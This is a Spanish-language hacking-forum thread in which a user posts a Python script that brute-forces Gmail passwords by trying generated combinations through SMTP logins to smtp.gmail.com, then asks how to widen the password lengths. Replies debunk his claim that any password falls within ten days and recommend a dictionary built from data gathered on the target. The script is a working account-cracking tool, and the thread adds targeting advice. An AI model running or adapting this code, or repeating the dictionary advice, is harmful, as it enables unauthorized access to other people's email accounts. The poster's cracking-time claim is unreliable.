elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Python] Crackear gmail con script
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python] Crackear gmail con script  (Leído 4,453 veces)
<Trocutor>

Desconectado Desconectado

Mensajes: 72


Ver Perfil
[Python] Crackear gmail con script
« en: 14 Junio 2017, 07:56 am »

Buenas, el otro dia vi una script "creada" por un usuario del foro y la verdad esque no es que fuese muy bien y le he hecho unas cuantas modificaciones:
Código
  1. #! /usr/bin/env python
  2. #-*- coding: utf-8 -*-
  3.  
  4. import smtplib
  5. import sys
  6. import os
  7. import itertools
  8.  
  9.  
  10. print """
  11. __________                                               .___
  12. \______   \_____    ______ ________  _  _____________  __| _/
  13. |     ___/\__  \ /  ___//  ___/\ \/ \/ /  _ \_  __ \/ __ |
  14. |    |     / __ \_\___ \ \___ \ \    (  <_> )  | \/ /_/ |
  15. |____|    (____  /____  >____  >  \/\_/ \____/|__|  \____ |
  16.                \/     \/     \/                          \/
  17. _________                       __                          
  18. \_   ___ \____________    ____ |  | __ ___________          
  19. /    \ \/\_  __ \__  \ _/ ___\|  |/ // __ \_  __ \        
  20. \    \____|  | \// __ \\  \___|    <\ ___/|  | \/          
  21. \______  /|__|  (____  /\___  >__|_ \\___  >__|            
  22.        \/            \/     \/     \/    \/          """
  23.  
  24. smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
  25. smtpserver.ehlo()
  26. smtpserver.starttls()
  27.  
  28. print "Te doy la bienvenida y enhorabuena si estas usando esto, este es el programa mas avanzado de cracking de passwords de cualquier sitio web con infinitos intentos de contraseña. ESTE PROGRAMA HA SIDO CREADO POR 'JorgyMaster'"
  29.  
  30.  
  31. user = raw_input("Correo a crackear")
  32.  
  33. # Minusculas abcdefghijklmnopqrstuvwxyz
  34. # Mayusculas ABCDEFGHIJKLMNOPQRSTUVWXYZ
  35. # Numeros 1234567890
  36. # Especiales !"#$%&/()=?¡*[_:,;.-'¿
  37.  
  38. longitud = 8 #<----Aqui se podria poner para que pruebe contraseñas desde 1 caracter hasta los que tu quieras , pero he probado con range y me da error, si alguien puede dejar en el post como seria....
  39. arreglo = list('Introduce los caracteres que creas que aparezcan, aqui')
  40. combinaciones = itertools.product(arreglo, repeat=longitud)
  41.  
  42. for i in combinaciones:
  43. password = ''.join(i)
  44.  
  45. try:
  46. smtpserver.login(user, password)
  47. print '----------------------CONTRASEÑA ENCONTRADA-------------------'
  48. print 'La contraseña es: ' + password
  49. break;
  50. except smtplib.SMTPAuthenticationError:
  51. print "Probando con la conraseña: " + password
  52.  
  53. sys.exit()


longitud = 8 #<----Aqui se podria poner para que pruebe contraseñas desde 1 caracter hasta los que tu quieras , pero he probado con range y me da error, si alguien puede dejar en el post como seria.... <--- Esto es una linea de codigo pero como ya he dicho nose como decirle que pruebe con una longitud de1 hasta 20 por ejemplo, ALGUIEN ME LO PODRIA DEJAR ABAJO?

Si tienes un bueno ordenador y alguien consigue poner lo de que pruebe contraseñas de 1  hasta 20 tendrias CUALQUIER contraseña en maximo 1 semana y 3 dias trabajando a pleno rendimiento








En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #1 en: 14 Junio 2017, 08:06 am »

primero que nada, este prorama a pesar de ser "creado por ti" (en realidad solo decorado) pertenece en idea a otra persona que merece el credito por exponerlo

segundo, claramente no conoces las matemáticas involucradas en fuerza bruta y por que la misma es inutil

Citar
Si tienes un bueno ordenador y alguien consigue poner lo de que pruebe contraseñas de 1  hasta 20 tendrias CUALQUIER contraseña en maximo 1 semana y 3 dias trabajando a pleno rendimiento

supongamos mayúsculas, minusculas y numeros, 62 simbolos y demos 2 para redondear a 64... supongamos que el servidor responde a 1.000.000 de solicitudes por segundo tardarías solo en 7 digitos 3 años de calculo en plano... y seamos sinceros, el servidor no te permitirá más de una decena por segundo, así que correr 4 digitos, podría tomar año y medio...



no se de donde sacaste esa locura


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
<Trocutor>

Desconectado Desconectado

Mensajes: 72


Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #2 en: 14 Junio 2017, 14:53 pm »

primero que nada, este prorama a pesar de ser "creado por ti" (en realidad solo decorado) pertenece en idea a otra persona que merece el credito por exponerlo

segundo, claramente no conoces las matemáticas involucradas en fuerza bruta y por que la misma es inutil

supongamos mayúsculas, minusculas y numeros, 62 simbolos y demos 2 para redondear a 64... supongamos que el servidor responde a 1.000.000 de solicitudes por segundo tardarías solo en 7 digitos 3 años de calculo en plano... y seamos sinceros, el servidor no te permitirá más de una decena por segundo, así que correr 4 digitos, podría tomar año y medio...



no se de donde sacaste esa locura


Hay una script hace 3 dias , yo la modifiqué
En línea

madoko

Desconectado Desconectado

Mensajes: 79


Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #3 en: 14 Junio 2017, 15:31 pm »

Engel_lex se refiere a eso, a que hagas mención del nick del usuario que hizo el primer programa y si es un post de este foro, que dejes un enlace de manera que le reconozcas su trabajo.

Aparte como también comenta los cálculos de tiempo que tardarías en sacar una contraseña están mal hechos.

Creo que sería mucho mejor llamar a un diccionario desde python hecho especificamente para la cuenta que desearas "asaltar" tras haber hecho algo de recopilación de datos
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #4 en: 14 Junio 2017, 17:24 pm »

Por eso es que el otro código es mucho ms eficiente que este :s básicamente lo que hiciste fue que agarraste un cortador láser y lo estás usando como martillo y a demás afirmando que es más eficiente
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
<Trocutor>

Desconectado Desconectado

Mensajes: 72


Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #5 en: 14 Junio 2017, 17:35 pm »

Engel_lex se refiere a eso, a que hagas mención del nick del usuario que hizo el primer programa y si es un post de este foro, que dejes un enlace de manera que le reconozcas su trabajo.

Aparte como también comenta los cálculos de tiempo que tardarías en sacar una contraseña están mal hechos.

Creo que sería mucho mejor llamar a un diccionario desde python hecho especificamente para la cuenta que desearas "asaltar" tras haber hecho algo de recopilación de datos


Ese usuario no creo la script , estaba en ingles y la traduje tambien
En línea

<Trocutor>

Desconectado Desconectado

Mensajes: 72


Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #6 en: 14 Junio 2017, 17:35 pm »

Por eso es que el otro código es mucho ms eficiente que este :s básicamente lo que hiciste fue que agarraste un cortador láser y lo estás usando como martillo y a demás afirmando que es más eficiente


Y entonces como seria mas eficiente si el toro se paraba al probar cada contraseñ?
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [Python] Crackear gmail con script
« Respuesta #7 en: 14 Junio 2017, 18:00 pm »

Citar
Y entonces como seria mas eficiente si el toro se paraba al probar cada contraseñ?

son cositas que se hacen para que no cualquiera sin conocimiento lo use XD

pero de resto usar diccionario, suponiendo que consigues uno con 50.000.000 de terminos, es más probable que uno de esos 50 millones sea la contraseña a que sea algo comrpendido entre aaaaaaa y aaFaaaa (aproximadamente la posibilidad 50 millones)
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Script que entra en gmail...etc. COMO?
Scripting
zaikar 1 2,028 Último mensaje 22 Noviembre 2012, 10:25 am
por Eleкtro
crackear gmail o hotmail por fuerza bruta « 1 2 »
Seguridad
BTshell 13 27,259 Último mensaje 20 Enero 2013, 22:49 pm
por corax
Crackear una contraseña que este en MD5 con script perl y backtrack
Ingeniería Inversa
nightcode 1 2,619 Último mensaje 1 Enero 2014, 03:44 am
por .:UND3R:.
Usar Hydra para crackear gmail. « 1 2 »
Hacking
alonsofernandez12 10 12,715 Último mensaje 29 Mayo 2017, 09:24 am
por MadBad
Cracking de gmail con python
Scripting
TheIllusionist 3 4,772 Último mensaje 12 Junio 2017, 22:56 pm
por <Trocutor>
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines